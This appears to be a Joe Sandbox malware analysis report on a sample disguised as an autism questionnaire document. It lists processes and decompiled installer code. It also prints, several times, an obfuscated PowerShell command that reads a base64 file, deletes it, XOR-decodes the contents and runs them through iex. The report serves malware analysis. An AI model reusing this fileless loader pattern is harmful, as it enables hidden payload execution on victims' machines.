                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:14:40:34
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            General

                                                                                            Start time:14:40:34
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:35
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
                                                                                            Imagebase:0x11b0000
                                                                                            File size:430592 bytes
                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET

                                                                                            General

                                                                                            Start time:14:40:35
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:35
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:35
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7f20f0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:48
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:50
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18138760929948388568 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18138760929948388568 --renderer-client-id=2 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job /prefetch:1
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:51
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=1964537546466602417 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:51
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8469343885171470224 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8469343885171470224 --renderer-client-id=4 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:52
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=3770922529545536729 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3770922529545536729 --renderer-client-id=5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            General

                                                                                            Start time:14:40:52
                                                                                            Start date:11/12/2021
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15315623175826486505 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15315623175826486505 --renderer-client-id=6 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1
                                                                                            Imagebase:0xc0000
                                                                                            File size:9475120 bytes
                                                                                            MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:11.6%
                                                                                              Total number of Nodes:859
                                                                                              Total number of Limit Nodes:34

                                                                                              Graph

404166 30865->30877 30866 403f21 30869 403ccf 30867->30869 30870 403cbf 30867->30870 30872 403c48 2 API calls 30870->30872 30875 40413c Sleep 30871->30875 30871->30877 30872->30869 30873 404000 30884 40400c 30873->30884 30885 403bcc 30873->30885 30874->30866 30874->30873 30880 403fe1 Sleep 30874->30880 30875->30865 30876->30874 30879 403fb3 Sleep 30876->30879 30878 403bcc VirtualAlloc 30877->30878 30882 404184 30877->30882 30878->30882 30879->30862 30880->30873 30881 403ff7 Sleep 30880->30881 30881->30874 30889 403b60 30885->30889 30887 403bd5 VirtualAlloc 30888 403bec 30887->30888 30888->30884 30890 403b00 30889->30890 30890->30887 30891 4b63a1 30892 4b63d3 30891->30892 30915 40e450 30892->30915 30894 4b640c SetWindowLongW 30919 41a87c 30894->30919 30899 4087c4 24 API calls 30900 4b648e 30899->30900 30927 4af728 30900->30927 30903 4af60c 24 API calls 30905 4b64b3 30903->30905 30904 4b64ec 30907 4b6505 30904->30907 30910 4b64ff RemoveDirectoryW 30904->30910 30905->30904 30906 4af1b4 9 API calls 30905->30906 30906->30904 30908 4b6519 30907->30908 30909 4b650e DestroyWindow 30907->30909 30911 4b6542 30908->30911 30942 408d08 40 API calls 30908->30942 30909->30908 30910->30907 30913 4b6538 30943 40540c 24 API calls 30913->30943 30944 405740 30915->30944 30917 40e463 CreateWindowExW 30918 40e49d 30917->30918 30918->30894 30945 41a8a4 30919->30945 30922 422bc4 GetCommandLineW 30923 422b34 24 API calls 30922->30923 30924 422be7 30923->30924 30925 407a20 24 API calls 30924->30925 30926 422c05 30925->30926 30926->30899 30928 4087c4 24 API calls 30927->30928 30929 4af763 30928->30929 30930 4af795 CreateProcessW 30929->30930 30931 4af7aa CloseHandle 30930->30931 30932 4af7a1 30930->30932 30934 4af7b3 30931->30934 30967 4af34c 26 API calls 30932->30967 30963 4af6fc 30934->30963 30937 4af7d1 30938 4af6fc 3 API calls 30937->30938 30939 4af7d6 GetExitCodeProcess CloseHandle 30938->30939 30940 407a20 24 API calls 30939->30940 30941 4af7fe 30940->30941 30941->30903 30941->30905 
30942->30913 30943->30911 30944->30917 30948 41a8bc 30945->30948 30949 41a8c5 30948->30949 30952 41a925 30949->30952 30961 41a7f4 107 API calls 30949->30961 30951 41a998 30953 407ba8 24 API calls 30951->30953 30952->30951 30959 41a942 30952->30959 30955 41a89c 30953->30955 30954 41a98c 30956 408664 24 API calls 30954->30956 30955->30922 30956->30955 30957 407a20 24 API calls 30957->30959 30958 408664 24 API calls 30958->30959 30959->30954 30959->30957 30959->30958 30962 41a7f4 107 API calls 30959->30962 30961->30952 30962->30959 30964 4af710 PeekMessageW 30963->30964 30965 4af722 MsgWaitForMultipleObjects 30964->30965 30966 4af704 TranslateMessage DispatchMessageW 30964->30966 30965->30934 30965->30937 30966->30964 30967->30931

                                                                                              Executed Functions

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 73%
                                                                                              			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                              				char _v8;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				char _v20;
                                                                                              				char _v24;
                                                                                              				char _v28;
                                                                                              				char _v32;
                                                                                              				char _v36;
                                                                                              				char _v40;
                                                                                              				char _v44;
                                                                                              				char _v48;
                                                                                              				char _v52;
                                                                                              				char _v56;
                                                                                              				char _v60;
                                                                                              				long _t39;
                                                                                              				_Unknown_base(*)()* _t42;
                                                                                              				_Unknown_base(*)()* _t43;
                                                                                              				_Unknown_base(*)()* _t46;
                                                                                              				signed int _t51;
                                                                                              				void* _t111;
                                                                                              				void* _t112;
                                                                                              				intOrPtr _t129;
                                                                                              				struct HINSTANCE__* _t148;
                                                                                              				intOrPtr* _t150;
                                                                                              				intOrPtr _t152;
                                                                                              				intOrPtr _t153;
                                                                                              
                                                                                              				_t152 = _t153;
                                                                                              				_t112 = 7;
                                                                                              				do {
                                                                                              					_push(0);
                                                                                              					_push(0);
                                                                                              					_t112 = _t112 - 1;
                                                                                              				} while (_t112 != 0);
                                                                                              				_push(_t152);
                                                                                              				_push(0x4b5388);
                                                                                              				_push( *[fs:eax]);
                                                                                              				 *[fs:eax] = _t153;
                                                                                              				 *0x4be664 =  *0x4be664 - 1;
                                                                                              				if( *0x4be664 >= 0) {
                                                                                              					L19:
                                                                                              					_pop(_t129);
                                                                                              					 *[fs:eax] = _t129;
                                                                                              					_push(0x4b538f);
                                                                                              					return E00407A80( &_v60, 0xe);
                                                                                              				} else {
                                                                                              					_t148 = GetModuleHandleW(L"kernel32.dll");
                                                                                              					_t39 = GetVersion();
                                                                                              					_t111 = 0;
                                                                                              					if(_t39 != 0x600) {
                                                                                              						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
                                                                                              						if(_t150 != 0) {
                                                                                              							 *_t150(0x800);
                                                                                              							asm("sbb ebx, ebx");
                                                                                              							_t111 = 1;
                                                                                              						}
                                                                                              					}
                                                                                              					if(_t111 == 0) {
                                                                                              						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
                                                                                              						if(_t46 != 0) {
                                                                                              							 *_t46(0x4b53e4);
                                                                                              						}
                                                                                              						E0040E520( &_v8);
                                                                                              						E00407E00(0x4be668, _v8);
                                                                                              						if( *0x4be668 != 0) {
                                                                                              							_t51 =  *0x4be668;
                                                                                              							if(_t51 != 0) {
                                                                                              								_t51 =  *(_t51 - 4);
                                                                                              							}
                                                                                              							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
                                                                                              								E004086E4(0x4be668, 0x4b53f4);
                                                                                              							}
                                                                                              							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
                                                                                              							E0040E54C(_v12, _t111);
                                                                                              							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
                                                                                              							E0040E54C(_v16, _t111);
                                                                                              							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
                                                                                              							E0040E54C(_v20, _t111);
                                                                                              							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
                                                                                              							E0040E54C(_v24, _t111);
                                                                                              							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
                                                                                              							E0040E54C(_v28, _t111);
                                                                                              							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
                                                                                              							E0040E54C(_v32, _t111);
                                                                                              							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
                                                                                              							E0040E54C(_v36, _t111);
                                                                                              							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
                                                                                              							E0040E54C(_v40, _t111);
                                                                                              							E0040873C( &_v44, L"version.dll",  *0x4be668);
                                                                                              							E0040E54C(_v44, _t111);
                                                                                              							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
                                                                                              							E0040E54C(_v48, _t111);
                                                                                              							E0040873C( &_v52, L"comres.dll",  *0x4be668);
                                                                                              							E0040E54C(_v52, _t111);
                                                                                              							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
                                                                                              							E0040E54C(_v56, _t111);
                                                                                              							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
                                                                                              							E0040E54C(_v60, _t111);
                                                                                              						}
                                                                                              					}
                                                                                              					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
                                                                                              					if(_t42 != 0) {
                                                                                              						 *_t42(0x8001);
                                                                                              					}
                                                                                              					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
                                                                                              					if(_t43 != 0) {
                                                                                              						 *_t43(1); // executed
                                                                                              					}
                                                                                              					goto L19;
                                                                                              				}
                                                                                              			}






























                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                                                              • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                                                                • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                                                                • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                                                              • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                                                              • API String ID: 2248137261-3182217745
                                                                                              • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                              • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                                                              • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                              • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 382 4af91c-4af942 GetSystemInfo VirtualQuery 383 4af948 382->383 384 4af9e7-4af9ee 382->384 385 4af9db-4af9e1 383->385 385->384 386 4af94d-4af954 385->386 387 4af956-4af95a 386->387 388 4af9c7-4af9d9 VirtualQuery 386->388 387->388 389 4af95c-4af967 387->389 388->384 388->385 390 4af978-4af98d VirtualProtect 389->390 391 4af969-4af96c 389->391 393 4af98f 390->393 394 4af994-4af996 390->394 391->390 392 4af96e-4af971 391->392 392->390 396 4af973-4af976 392->396 393->394 395 4af9a5-4af9a8 394->395 397 4af9aa-4af9af 395->397 398 4af998-4af9a1 call 4af914 395->398 396->390 396->394 397->388 400 4af9b1-4af9c2 VirtualProtect 397->400 398->395 400->388
                                                                                              C-Code - Quality: 100%
                                                                                              			E004AF91C(void* __eax) {
                                                                                              				char _v44;
                                                                                              				struct _SYSTEM_INFO _v80;
                                                                                              				long _v84;
                                                                                              				char _v88;
                                                                                              				long _t22;
                                                                                              				int _t28;
                                                                                              				void* _t37;
                                                                                              				struct _MEMORY_BASIC_INFORMATION* _t40;
                                                                                              				long _t41;
                                                                                              				void** _t42;
                                                                                              
                                                                                              				_t42 =  &(_v80.dwPageSize);
                                                                                              				 *_t42 = __eax;
                                                                                              				_t40 =  &_v44;
                                                                                              				GetSystemInfo( &_v80); // executed
                                                                                              				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
                                                                                              				if(_t22 == 0) {
                                                                                              					L17:
                                                                                              					return _t22;
                                                                                              				} else {
                                                                                              					while(1) {
                                                                                              						_t22 = _t40->AllocationBase;
                                                                                              						if(_t22 !=  *_t42) {
                                                                                              							goto L17;
                                                                                              						}
                                                                                              						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
                                                                                              							L15:
                                                                                              							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
                                                                                              							if(_t22 == 0) {
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							continue;
                                                                                              						} else {
                                                                                              							_v88 = 0;
                                                                                              							_t41 = _t40->Protect;
                                                                                              							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
                                                                                              								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
                                                                                              								if(_t28 != 0) {
                                                                                              									_v88 = 1;
                                                                                              								}
                                                                                              							}
                                                                                              							_t37 = 0;
                                                                                              							while(_t37 < _t40->RegionSize) {
                                                                                              								E004AF914(_t40->BaseAddress + _t37);
                                                                                              								_t37 = _t37 + _v80.dwPageSize;
                                                                                              							}
                                                                                              							if(_v88 != 0) {
                                                                                              								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
                                                                                              							}
                                                                                              							goto L15;
                                                                                              						}
                                                                                              					}
                                                                                              					goto L17;
                                                                                              				}
                                                                                              			}














                                                                                              APIs
                                                                                              • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                                                              • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                                                              • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
